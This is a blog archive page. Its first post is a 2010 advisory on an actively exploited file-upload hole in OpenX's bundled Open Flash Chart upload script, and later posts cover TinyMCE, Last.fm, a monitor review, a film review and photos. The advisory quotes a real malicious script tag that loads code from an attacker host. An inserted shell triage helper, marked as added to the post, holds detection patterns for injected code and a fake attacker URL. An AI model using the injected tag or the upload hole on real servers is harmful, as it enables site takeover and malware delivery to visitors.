9. September 2010

Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2


There is a critical security flaw in OpenX 2.8.6 (and 2.8.5, and probably several earlier versions) that allows attackers to gain control of the web server account and thus of the ad server. The hole is being actively exploited in the wild (as I learned the hard way). At the moment it seems to be known only to attackers (in the OpenX context), since I was not able to find any warning or other reference to it.

The problem lies in the following file:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

The file ships with the video plugin. It is a component of Open Flash Chart 2, which is already known to be vulnerable. In short, it lets an attacker upload any file to the server, including executable ones. This way, the attacker uploads a PHP backdoor and gains full access to the web server account. From there he can (amongst other things) take control of the OpenX installation.

In our case, the attacker created a new admin user called “root” in the OpenX database. Interestingly, this user was not shown anywhere in the user accounts, but it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly no one has bothered to release a fix yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected, since this file seems to be connected to the reports of the video plugin and might even be unused (it is part of a library that ships as a whole). Alternatively, access to the file can be restricted via .htaccess to trusted users.

I highly recommend doing this immediately, since this vulnerability is being actively exploited.

Also check for signs of an already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that no one else could take control of his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you have probably already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so better get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones and remove any suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server, because it might have been rooted. But if your server was configured safely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself whether you want to take this time-consuming measure.
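A small triage helper for the two checks described above (comparing the shipped ofc_upload_image.php with a trusted copy, and scanning the prepend/append fields of zones and banners for injected code) plus the .htaccess fragment for the alternative workaround. This is an added example, not code from the original post or from OpenX; it assumes you have a fresh copy of the upload script from a trusted download and have exported the prepend/append fields as tab-separated lines, and all sample data in it is constructed with a placeholder host.

```shell
#!/bin/sh
# Added triage helper, not code from the original post. Assumptions: a trusted
# copy of ofc_upload_image.php (from a fresh OpenX download) is at hand, and the
# prepend/append fields of ox_zones and ox_banners were exported as tab-separated
# lines "table<TAB>id<TAB>field<TAB>value". All sample data below is constructed.
set -u

# Has the shipped upload script been edited? An intruder who "closes" the hole
# for others leaves a file that no longer matches the distributed one.
# Prints one of: missing | unmodified | modified
check_upload_script() {
    installed="$1"; trusted="$2"
    [ -f "$installed" ] || { echo missing; return 0; }
    if cmp -s "$installed" "$trusted"; then echo unmodified; else echo modified; fi
}

# Print exported prepend/append rows that load a remote script or embed PHP.
# Exit status 1 means nothing suspicious was found (grep semantics).
scan_prepend_append() {
    grep -iE '<script[^>]*src=["'"'"']?https?://|<\?php|eval[[:space:]]*\(' "$1"
}

# Apache 2.2-style .htaccess fragment that blocks the upload script outright,
# the post's alternative to deleting it (swap "Deny from all" for an allow-list
# of trusted addresses if the video reports are really needed).
htaccess_deny_upload() {
    cat <<'EOF'
<Files "ofc_upload_image.php">
    Order deny,allow
    Deny from all
</Files>
EOF
}

# --- constructed demo data (placeholder host, not a real indicator) ---------
TMP=$(mktemp -d); trap 'rm -rf "$TMP"' EXIT
printf '<?php /* trusted copy */ ?>\n' > "$TMP/trusted.php"
printf '<?php /* trusted copy */ exit; ?>\n' > "$TMP/installed.php"  # tampered
{
  printf 'ox_zones\t1\tappend\t<script type="text/javascript" src="http://attacker.invalid:8080/File.js"></script>\n'
  printf 'ox_zones\t2\tappend\t\n'
  printf 'ox_banners\t7\tprepend\t<!-- sponsored -->\n'
} > "$TMP/export.tsv"

UPLOAD_STATE=$(check_upload_script "$TMP/installed.php" "$TMP/trusted.php")
HITS=$(scan_prepend_append "$TMP/export.tsv" | wc -l | tr -d ' ')
echo "upload script: $UPLOAD_STATE; suspicious prepend/append rows: $HITS"
```

To produce the export on a real installation, dump the prepend and append columns of ox_zones and ox_banners with your database client in tab-separated form; any row the scan prints deserves a manual look.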

Keywords: OpenX, security, web development

12. July 2009

bbPress compatibility plugin for TinyMCE


I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting, thereby preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.

Installation

Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.

Download

bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Keywords: bbPress, plugins, TinyMCE

9. March 2009

Music Intersector Now With Up to Five Users


Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Keywords: intersection, last.fm, music, recommendation

7. February 2009

Ars Electronica Festival 2008: Photos, Impressions and Links

Ars Electronica 2008

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhibition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kinda “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a Saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhibition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

Keywords: Ars Electronica, art, Austria, exhibition, festival, Linz, photos, report

19. January 2009

beyond vision


beyond vision

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together both media tell an abstract story like it would not be possible for each medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances somewhen…

Keywords: beyond vision, concert, installation, meta, music, video

5. January 2009

My Dell UltraSharp 2709W (Review / Test)

Dell UltraSharp 2709W

Ok, “my” is not quite right in this case. Not too long ago I bought a new monitor, the Samsung SyncMaster 226bw, and I would not be that decadent to buy yet another new monitor so soon. :) I am using the Dell UltraSharp 2709W for a larger project, but I do not own it. A bold 27” screen size and a resolution of 1980×1200 come in quite handy for video post-processing. Too bad I’ll have to return it some day…

Specs

Screen size: 27”
Resolution: 1980×1200
Video ports: DVI, VGA, HDMI, DisplayPort, Composite Video, Component Video
Viewing angles: 178°/178° (Standard)
Contrast: 3000:1 (dynamic), Standard
Response time: 6 ms (Grey to grey), Standard
Energy consumption: 57 W (standard); 110 W (max)
Panel technology: S-PVA
Integrated speakers: no
Other integrated accessories: 4 port USB hub, 9-in-2 card reader
Price: Bought in July 2008 directly from Dell for 623 Euros. Current price: 831,81€

First Impression

A Dell UltraSharp 2709W on my desktop

After unboxing my 2709W, my first thought was “yay, biiig”. :) The UltraSharp 2709W fits just barely together with my laptop and old monitor on my desktop. The second monitor has to be turned upright to fit beside the large 27” screen.
My personal command center. :)

Design

Visually, this large monitor does not have to hide. It is well built and has a beautifully simple design which also isn’t spoiled by pointless speakers. The material itself does not feel or look cheap, although Dell’s official product photo does not look that convincing. Fortunately, it looks better in reality.

One reason why the monitor looks so beautifully simple is that there are very few visible buttons. Only the power button permanently emits a blue or orange light. The other buttons for menu controls are very small LED rectangles, which stay black and mostly invisible when not in use. They only wake up and shine when you approach them with your hand or finger. This is quite cool, although the technology still seems to have a few hiccups – more about this later.

Image Quality: See next page

(This article is also available in German)

Keywords: computer, Dell, display, hardware, LCD, monitor, review, screen, test, TFT

1. October 2008

My Name is Bruce (Movie Review)


My Name is Bruce - Poster

Plot Preview

Bruce Campbell (Bruce Campbell) is currently busy producing his newest movie, the terrific Cave Alien 2, when a young fanboy* asks for his help. He accidentally released an ancient Chinese daemon that now has set out to slaughter everyone who is related to the fanboy – coming from a small town this puts its whole population on the brink of a bloody death.

The passionate Bruce Campbell fan sees only one solution to this problem: Bruce himself has to save the town utilizing his elite monster-slaying powers which he acquired acting in various grand movies like Evil Dead. The True Fan faithfully overlooks the dramatic downfall which Bruce’s career has taken since his heyday. Neither is Fanboy irritated by the fact that his idol turns out to be the most arrogant asshole alive who couldn’t care less about his fans and annoyingly keeps hitting on fanboy’s mother (and pretty much any other female).

Thanks to some gentle persuasion involving a baseball bat and Bruce’s subsequent erroneous assumption that the whole story is just an elaborate birthday present from his manager (Ted Raimi), he agrees to pick up the fight against the daemon…

Review

My Name is Bruce: Evil Chinese Demon Spirit

As one might guess from the plot description, My Name is Bruce is not exactly a movie that is meant to be taken seriously. It is a parody – primarily on Bruce Campbell himself, but also on the movies in which he acted.

» read on!

(This article is also available in German)

Keywords: Bruce Campbell, comedy, horror, movies, review

5. September 2008

Lethal Water Overdose: Water Intoxication


Pretty much every substance can be unhealthy or even lethal when taken in large enough quantities. This also holds true for plain water.

If one drinks too much water, the level of sodium in the blood gets out of balance. There is enough sodium, but too much water. The consequence is hyponatremia, or water intoxication. The possible symptoms are quite scary:

“Initial symptoms typically include light-headedness, sometimes accompanied by nausea, vomiting, headache and/or malaise. Sodium levels below 100 mmol/l (2.3 g/l) frequently result in cerebral edema, seizures, coma, and death within a few hours of drinking the excess water.” (Wikipedia)

In extreme cases it is even possible to die of water. This should be quite impossible through any sane consumption (so don’t panic), but every now and then some people indeed manage to die of water – usually in the context of strange contests.

» read on!

(This article is also available in German)

Keywords: intoxication, overdose, water

3. September 2008

Atmospheric Railroad Photos by Kevin Scanlon


Railroad romance by Kevin Scanlon

I stumbled over a beautiful photo set by Kevin Scanlon. Bearing the simple title “Railroad” it shows diverse impressions of railroad scenery.

I’m not particularly drawn to railroads, but these photos are really beautiful. Especially the numerous shots with backlight produce a wonderful atmosphere.

» “Railroad” by Kevin Scanlon

Why Kevin Scanlon presents such beautiful images on such a not beautiful website is beyond my comprehension, though. :)

(This article is also available in German)

Keywords: photos, railroad

29. August 2008

Step-by-Step Video of a Matte Painting by James McWilliams / Digital Animosity


Ancient Bathhouse by James McWilliams

A matte painting commonly refers to a painted or drawn piece of scenery used in movies or animations. Matte paintings belong more or less to the standard repertoire of special effects.

James McWilliams created an interesting short video which shows the progress of such a painting. In several steps he first paints the scenery of an “ancient bathhouse” (read: mysterious ruins including a waterfall). Then the painting is projected onto simple 3D geometry and a short tracking shot through the scenery is animated.

The video is a nice insight into how such effects are created. The download size is kinda hefty, though: 65MB.

» Digital Animosity / James McWilliams

(via The Reaction)


(This article is also available in German)

Keywords: compositing, effects, matte painting, video
